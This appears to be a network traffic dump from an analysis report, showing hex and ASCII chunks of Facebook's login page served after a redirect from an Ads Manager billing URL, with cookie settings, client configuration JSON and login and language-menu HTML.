                                                                                    2023-02-07 18:46:15 UTC1227INData Raw: 63 35 65 37 0d 0a 30 50 41 74 6c 58 67 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 31 4d 51 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b 6b 4d 70 5f 78 62 50 5a 51 45 22 7d 2c 22 33 38 33 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 57 32 33 6c 51 30 58 78 41 5a 6e 69 4d 57 6f 51 22 7d 2c 22 34 30 37 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 70 58 34 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73
                                                                                    Data Ascii: c5e70PAtlXg"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwq1MQ"},"3752":{"result":false,"hash":"AT6eS5UTkkMp_xbPZQE"},"3831":{"result":false,"hash":"AT4W23lQ0XxAZniMWoQ"},"4075":{"result":false,"hash":"AT4_ZQi0sTjSt-RxpX4"},"8126":{"result":false,"has
                                                                                    2023-02-07 18:46:15 UTC1229INData Raw: 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c 73 22 3a 7b 22 74 22 3a 31 35 38 32 38 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 70 69 78 65 6c 5f 72 61 74 69 6f 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6e 6f 73 63 72 69 70 74 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 70 72 65 73 65 6e 63 65 22 3a 7b 22 74 22 3a 32 35 39 32 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 73 66 61 75 22 3a 7b 22 73 22 3a 22 4e 6f 6e
                                                                                    Data Ascii: ,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_ls":{"t":158284800,"s":"None"},"m_pixel_ratio":{"t":604800,"s":"None"},"noscript":{"s":"None"},"presence":{"t":2592000,"s":"None"},"sfau":{"s":"Non
                                                                                    2023-02-07 18:46:15 UTC1230INData Raw: 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 39 37 34 38 37 31 38 39 37 31 35 38 33 35 36 33 34 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62 6c 22 3a 74 72 75 65 2c 22 63 6f 6d 65 74 5f 65 6e 76 22 3a 30 2c 22 77 62 6c 6f 6b 73 5f 65 6e 76 22 3a 66 61 6c 73 65 2c 22 73 70 69 6e 22 3a 34 2c 22 5f 5f 73 70 69 6e 5f 72 22 3a 31 30 30 36 39 32 32 39 36 32 2c 22 5f 5f 73 70 69 6e 5f 62 22 3a 22 74 72 75 6e 6b
                                                                                    Data Ascii: "is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7197487189715835634","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_bl":true,"comet_env":0,"wbloks_env":false,"spin":4,"__spin_r":1006922962,"__spin_b":"trunk
                                                                                    2023-02-07 18:46:15 UTC1232INData Raw: 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54 53 5f 4d 45 54 52 49 43 53 5f 44 45 50 52 45 43 41 54 49 4f 4e 22 2c 22 41 44 5f 44 52 41 46 54 5f 45 4e 41 42 4c 45 5f 53 59 4e 43 52 48 4f 4e 4f 55 53 5f 46 52 41 47 4d 45 4e 54 5f 56 41 4c 49 44 41 54 49
                                                                                    Data Ascii: PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_METRICS_DEPRECATION","AD_DRAFT_ENABLE_SYNCRHONOUS_FRAGMENT_VALIDATI
                                                                                    2023-02-07 18:46:15 UTC1233INData Raw: 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 70 72 65 66 65 72 5f 6d 65 73 73 61 67 65 5f 63 68 61 6e 6e 65 6c 22 3a 74 72 75 65 7d 2c 33 34 31 39 5d 2c 5b 22 44 54 53 47 49 6e 69 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 74 6f 6b 65 6e 22 3a 22 22 2c 22 61 73 79 6e 63 5f 67 65 74 5f 74 6f 6b 65 6e 22 3a 22 22 7d 2c 33 35 31 35 5d 2c 5b 22 55 72 69 4e 65 65 64 52 61 77 51 75 65 72 79 53 56 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 75 72 69 73 22 3a 5b 22 64 6d 73 2e 6e 65 74 6d 6e 67 2e 63 6f 6d 22
                                                                                    Data Ascii: ampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[],{"prefer_message_channel":true},3419],["DTSGInitData",[],{"token":"","async_get_token":""},3515],["UriNeedRawQuerySVConfig",[],{"uris":["dms.netmng.com"
                                                                                    2023-02-07 18:46:15 UTC1235INData Raw: 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f 72 22 3a 22 31 22 2c 22 75 73 65 46 65 74 63 68 53 74 72 65 61 6d 41 6a 61 78 50 69 70 65 54 72 61 6e 73 70 6f 72 74 22 3a 66 61 6c 73 65 7d 2c 33 32 38 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 46 62 74 52 65 73 75 6c 74 47 4b 22 2c 5b 5d 2c 7b 22 73 68 6f 75 6c 64 52 65 74 75 72 6e 46 62 74 52 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 69 6e 6c 69 6e 65 4d 6f 64 65 22 3a 22 4e 4f 5f 49 4e 4c 49 4e 45 22 7d 2c 38 37 36 5d 2c 5b 22 49 6e 74 6c 50 68 6f 6e 6f 6c 6f 67 69 63 61 6c 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 6d 65 74 61 22 3a 7b 22 5c 2f 5f 42 5c 2f 22 3a 22 28 5b 2e 2c 21 3f
                                                                                    Data Ascii: ig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},328],["FbtQTOverrides",[],{"overrides":{}},551],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlPhonologicalRules",[],{"meta":{"\/_B\/":"([.,!?
                                                                                    2023-02-07 18:46:15 UTC1236INData Raw: 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 70 70 6f 72 74 5c 2f 69 6e 65 6c 69 67 69 62 6c 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 5c 2f 6c 5c 2f 22 3a 31 2c 22 5c 2f 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 73 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 64 74 73 67 5c 2f 22 3a 31 2c 22 5c 2f 63 68 65 63 6b 70 6f 69 6e 74 5c
                                                                                    Data Ascii: terstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1,"\/zero\/support\/ineligible\/":1,"\/zero_balance_redirect\/":1,"\/zero_balance_redirect":1,"\/zero_balance_redirect\/l\/":1,"\/l.php":1,"\/lsr.php":1,"\/ajax\/dtsg\/":1,"\/checkpoint\
                                                                                    2023-02-07 18:46:15 UTC1237INData Raw: 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 68 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 6c 65 61 72 6e 6d 6f 72 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 75 72 63 68 61 73 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 75 70 67 72 61 64 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c
                                                                                    Data Ascii: sell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"\/upsell\/h\/promos\/":1,"\/upsell\/loan\/learnmore\/":1,"\/upsell\/purchase\/":1,"\/upsell\/promos\/upgrade\/":1,"\/upsell\/buy_redirect\/":1,"\/upsell\/loan\/buyconfirm\/":1,"\/upsell
                                                                                    2023-02-07 18:46:15 UTC1239INData Raw: 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 24 5e 7c 41 63 62 45 76 66 37 50 64 33 37 35 73 7a 75 42 64 35 50 5a 61 6f 58 59 4a 78 6b 4c 56 61 79 64 6b 4c 41 62 33 6a 72 76 5f 63 57 68 37 6c 6d 64 6d 47 72 58 67 53 39 6a 34 38 73 41 6f 5f 76 44 71 6c 75 41 31 76 6a 46 32 56 34 4e 65 79 30 38 70 68 4b 2d 47 35 34 7c 66 64 2e 41 63 62 4d 36 35 4e 47 2d 52 6c 7a 56 4b 6f 59 65 48 6b 75 56 70 64 5f 32 53 73 55 67 30 35 71 6c 72 2d 54 50 35 35 79 38 49 77 32 31 53 36 77 32 43 33 55 36 73 6a 47 6a 53 31 46 4d 6b 71 66 35 6b 61 65 62 35 45 6f 6a 78 30 78 68 44 79 75 4c 79 6d 6d 4e 44 36 6d 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22
                                                                                    Data Ascii: CoreData",[],{"device_id":"$^|AcbEvf7Pd375szuBd5PZaoXYJxkLVaydkLAb3jrv_cWh7lmdmGrXgS9j48sAo_vDqluA1vjF2V4Ney08phK-G54|fd.AcbM65NG-RlzVKoYeHkuVpd_2SsUg05qlr-TP55y8Iw21S6w2C3U6sjGjS1FMkqf5kaeb5Eojx0xhDyuLymmND6m","app_id":"256281040558","enable_bladerunner"
                                                                                    2023-02-07 18:46:15 UTC1240INData Raw: 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 33 42 36 4c 68 76 51 67 4f 5f 46 34 54 59 75 58 61 59 4f 53 33 39 33 48 57 47 50 47 6b 73 37 57 57 4c 38 45 77 7a 50 4a 44 42 4f 6f 47 43 4b 73 74 61 64 41 69 4f 4a 4b 63 33 56 5f 46 30 6c 4e 48 78 36 45 79 70 6d 74 35 63 76 43 6f 56 31 72 73 34 77 71 6a 53 2d 48 30 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f
                                                                                    Data Ascii: "]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa3B6LhvQgO_F4TYuXaYOS393HWGPGks7WWL8EwzPJDBOoGCKstadAiOJKc3V_F0lNHx6Eypmt5cvCoV1rs4wqjS-H0"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"],{"__
                                                                                    2023-02-07 18:46:15 UTC1242INData Raw: 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d 2c 22 69 6e 74 65
                                                                                    Data Ascii: ":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{},"inte
                                                                                    2023-02-07 18:46:15 UTC1243INData Raw: 68 68 20 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 32 43 75 67 58 54 72 45 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 37 35 37 39 35 35 37 35 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 34 5f 79 76 22 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 20 64 61 74 61 2d 72 65 66 65 72 72 65 72 3d 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 3e 3c 64 69 76
                                                                                    Data Ascii: hh webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="2CugXTrE">requireLazy(["bootstrapWebSession"],function(j){j(1675795575)})</script><div class="_li" id="u_0_4_yv"><div id="pagelet_bluebar" data-referrer="pagelet_bluebar"><div
                                                                                    2023-02-07 18:46:15 UTC1245INData Raw: 20 69 6e 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 62 75 74 74 6f 6e 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 69 64 3d 22 75 5f 30 5f 30 5f 51 2f 22 20 2f 3e 3c 2f 6c 61 62 65 6c 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 6c 61 62 65 6c 5f 66 69 65 6c 64 22 3e 3c 2f 74 64 3e 3c 74 64 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 6c 61 62 65 6c 5f 66 69 65 6c 64 22 3e 3c 64 69 76 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 72 65 63 6f 76 65 72 2f 69 6e 69 74 69 61 74 65 3f 6c 77 76 3d 31 30 30 26 61 6d 70 3b 61 72 73 3d 72 6f 79 61 6c 5f 62 6c 75 65 5f 62 61 72 22 3e 46 6f
                                                                                    Data Ascii: in" data-testid="royal_login_button" type="submit" id="u_0_0_Q/" /></label></td></tr><tr><td class="login_form_label_field"></td><td class="login_form_label_field"><div><a href="https://www.facebook.com/recover/initiate?lwv=100&amp;ars=royal_blue_bar">Fo
                                                                                    2023-02-07 18:46:15 UTC1246INData Raw: 34 6a 79 30 20 73 69 67 6e 75 70 5f 62 74 6e 20 5f 34 6a 79 34 20 5f 34 6a 79 32 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 68 72 65 66 3d 22 2f 72 2e 70 68 70 3f 6c 6f 63 61 6c 65 3d 65 6e 5f 55 53 22 3e 43 72 65 61 74 65 20 4e 65 77 20 41 63 63 6f 75 6e 74 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 75 69 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 61 72 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 62 5f 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 20 22 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64
                                                                                    Data Ascii: 4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="/r.php?locale=en_US">Create New Account</a></span></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div class="fb_content clearfix " id="content" role="main"><d
                                                                                    2023-02-07 18:46:15 UTC1248INData Raw: 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 64 65 5f 44 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e
                                                                                    Data Ascii: .facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.
                                                                                    2023-02-07 18:46:15 UTC1249INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 70 74 5f 50 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 74 2d 70 74 2e 66 61 63 65
                                                                                    Data Ascii: " href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.face
                                                                                    2023-02-07 18:46:15 UTC1251INData Raw: 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 70 61 6e 69 73 68 22 3e 45 73 70 61 c3 b1 6f 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 2d 74 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43
                                                                                    Data Ascii: return false;" title="Spanish">Espaol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setC
                                                                                    2023-02-07 18:46:15 UTC1252INData Raw: 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 38 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 48 69 6e 64 69 22 3e e0 a4 b9 e0 a4 bf e0 a4 a8 e0 a5 8d e0 a4 a6 e0 a5 80 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73
                                                                                    Data Ascii: count_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"></a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings
                                                                                    2023-02-07 18:46:15 UTC1254INData Raw: 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 77 61 74 63 68 2f 22 20 74 69 74 6c 65 3d 22 42 72 6f 77 73 65 20 6f 75 72 20 57 61 74 63 68 20 76 69 64 65 6f 73 2e 22 3e 57 61 74 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6c 61 63 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 70 6f 70 75 6c 61 72 20 70 6c 61 63 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 6c 61 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 61 6d 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 67 61 6d 65 73 2e 22 3e 47 61 6d 65 73 3c 2f 61 3e 3c 2f 6c 69
                                                                                    Data Ascii: </a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li
